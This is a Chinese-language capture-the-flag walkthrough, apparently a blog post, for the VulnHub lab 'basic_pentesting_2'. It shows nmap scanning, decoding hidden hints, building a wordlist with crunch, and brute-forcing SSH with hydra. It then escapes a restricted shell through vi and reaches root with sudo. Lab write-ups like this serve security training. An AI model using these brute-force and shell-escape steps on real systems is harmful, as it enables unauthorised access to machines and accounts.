basic_pentesting_2靶场实战【超详细】

下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

一、靶场配置

网卡配置为nat

二、主机探测与端口扫描

nmap 192.168.121.0/24

 开放了22、80、31337端口

nmap 192.168.121.188 -p- -A -sV -Pn

 访问80web服务

 提示跟随白色兔子

f12查看源码,发现一个图片地址

 图片名字指向了31337端口,我们打开它是白色兔子

 访问31337端口看看

 F12查看源码

发现一串base64加密的字符

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

对其进行解码,解出如下内容

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

是把一串内容写入到了 Cypher.matrix 文件中

访问该文件

 发现其被下载,打开看看

 可能是什么加密方式,搜了一下,是 Brainfuck 加密

使用工具对其进行解密

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

说是能以 guest 用户进行登录 ,密码为 k1ll0rXX ,但是最后两位忘了,所以用XX代替,需要爆破一下

三、get shell

根据密码样式,最后两位大概率 小写字母+数字,使用kali中crunch工具生成字典

 命令解释

crunch 8 8 -t k1ll0r%@ -o 1.txt
#参数
8 8:密码最小长度和最大长度
-t:使用特殊符号
%:0-9数字
@:小写字母
-o:输入到指定文件

用 hydra 工具进行密码爆破

hydra -l guest -P passwd.txt ssh://192.168.121.188

爆破出密码为:

k1ll0r7n

尝试ssh连接

ssh guest@192.168.121.188

 连接成功

四、提权

sudo -l

查看具有sudo权限的命令程序

无法使用

很多命令也无法使用,执行export看看

 发现shell被限制

经过不断的尝试,vi命令可以使用

vi

按shift+:

!/bin/bash

 发现还是无法执行一些命令,执行以下命令,配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

 

 添加完环境变量之后,直接sudo su,提权成功

  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值